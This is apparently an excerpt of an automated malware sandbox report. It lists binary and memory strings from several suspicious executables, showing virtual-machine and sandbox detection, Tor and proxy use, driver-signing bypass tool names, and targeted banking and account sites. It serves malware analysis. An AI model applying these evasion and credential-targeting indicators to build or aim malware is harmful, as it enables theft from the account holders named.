                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: ameNewaPINGPOSTPathQEMUROOTH
                    Source: svchost.exe, 00000002.00000002.3392661017.0000021914E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3432539216.000002191A459000.00000004.00000020.00020000.00000000.sdmp, simplewebbuilder.exe, 00000011.00000002.3380805385.0000000000808000.00000004.00000020.00020000.00000000.sdmp, simplewebbuilder.exe, 00000011.00000002.3380805385.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.000000000070F000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000749000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.000000000070F000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000749000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000749000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3370913149.00000000006A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000857000.00000004.00000020.00020000.00000000.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3291145110.0000000000A78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: 11VBoxSFWINDIRWD
                    Source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: aryvmcixn-SR-%W
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: main.isRunningInsideVMWare
                    Source: syncUpd.exe, 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
                    Source: InstallUtil.exe, 00000004.00000002.3387573550.0000000001508000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll885Cp
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: tVMSrvcs|!
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: \\.\HGFS`
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3278905351.0000000000DAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: vmhgfsP
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS 